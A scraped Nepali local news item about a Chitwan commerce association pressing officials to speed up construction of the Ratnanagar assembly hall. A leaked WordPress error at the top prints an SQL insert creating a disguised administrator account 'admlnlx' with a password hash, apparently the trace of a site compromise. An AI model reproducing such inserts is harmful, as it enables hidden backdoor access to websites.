WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbJGlfhaz13yLl3B7E0m9AwCU1vHWh1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:11:12', '', 'admlnlx', 'admlnlx')
चितवन, माघ १४–
रत्ननगर उद्योग वाणिज्य संघले रत्ननगरमा सभाहल निर्माणको कार्यलाई तिव्रता दिने ध्यानाकर्षण गराएको छ ।
संघको अध्यक्ष ज्ञानबहादुर विसुरालको नेतृत्वमा गएको डेलिगेशन टोलीले शहरी विकास तथा भवन निर्माण विभाग, डिभिजन कार्यालयको ध्यानार्षण गराएको हो । संघले पूर्व पश्चिम राजमार्गदेखि करिव ८५० मिटर दक्षिण तर्फ वडा नं १ र ४ को सिमानामा करिव (१–४–०) क्षेत्रफल जमिनमा निर्माणाधिन रत्ननगर सभाहल निर्माण कार्यलाई तिव्रता दिन माग गरेको हो ।
विगत देखि क्रमागत रुपमा जग्गा सिमांकन, नक्शांकन, माटो परीक्षण हुँदै हाल आएर यसको निर्माण र कार्यन्वयन तहमा पुगेकोमा स्थानीयबासी खुशी रहेको जनाउँदै समुदायको भावनालाई एकरुपता सहित निर्माण कार्य तिव्र रुपमा अघि बढाउनको लागि अनुरोध गरेको छ । संघका पूर्व अध्यक्ष गोपाल कर्माचार्य, केशवनारायण श्रेष्ठ, नारायणकाजी श्रेष्ठ, वरिष्ठ उपाध्यक्ष अनिलकृष्ण श्रेष्ठ, उपाध्यक्ष राजाराम रेग्मी, महासचिव देवेन्द्र कुमार श्रेष्ठ लगायतको सहभागीता रहेको डेलिगेशन टोलीले शहरी विकास तथा भवन निर्माण कार्यालय, डिभिजन कार्यालयका प्रमुखलाई ज्ञापन पत्र बुझाउनुका साथै ध्यानाकर्षण गराएको थियो ।